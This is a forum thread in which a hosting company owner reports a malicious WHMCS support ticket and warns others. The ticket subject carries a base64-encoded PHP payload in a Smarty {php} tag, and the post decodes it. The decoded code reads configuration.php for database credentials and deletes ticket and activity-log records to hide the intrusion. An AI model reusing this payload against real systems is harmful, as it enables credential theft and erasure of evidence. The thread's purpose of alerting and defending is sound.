Latest Announcemnent
New thread
Status
Not open for further replies.
H

_Hosting_

Banned
Banned
308
2010
4
0
Hi everyone,

I dnt know if its related to recent hack or what,

In Mxzon's billing system, we got a a ticket with subject:

Code: 
{php}eval(base64_decode('JHRleHQ9ZmlsZV9nZXRfY29udGVudHMoImNvbmZpZ3VyYXRpb24ucGhwIik7DQoNCg0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KDQpldmFsKCR0ZXh0KTsNCg0KJGRiPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgb3IgZGllKCJDYW4ndCBvcGVuIGNvbm5lY3Rpb24gdG8gTXlTUUwiKTsNCm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW4ndCBzZWxlY3QgZGF0YWJhc2UiKTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIFdIRVJFIHRpdGxlIGxpa2UgMHgyNTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZSk7DQokZGVsZXRlMiA9IkRFTEVURSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9JyIuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCg=='));{/php}

Decoded:
Code: 
$text=file_get_contents("configuration.php");


$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);

eval($text);

$db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog  WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);

I dnt know if it worked, but it didn't harmed our billing system...
I deleted the ticket, plz be alerted as i think boxslots and servedome are also heaving issues...

I think if we disable eval it can make this hack zero...
what you guys suggest??

Regards,
Ali Arshad
Founder / CEO
Mxzon Hosting Solutions
(www.mxzon.com)
 
6 comments
I got the same support ticket submitted today from a France IP Address.

I already applied the WHMCS patch the day it was released.
 
Status
Not open for further replies.
Back
Top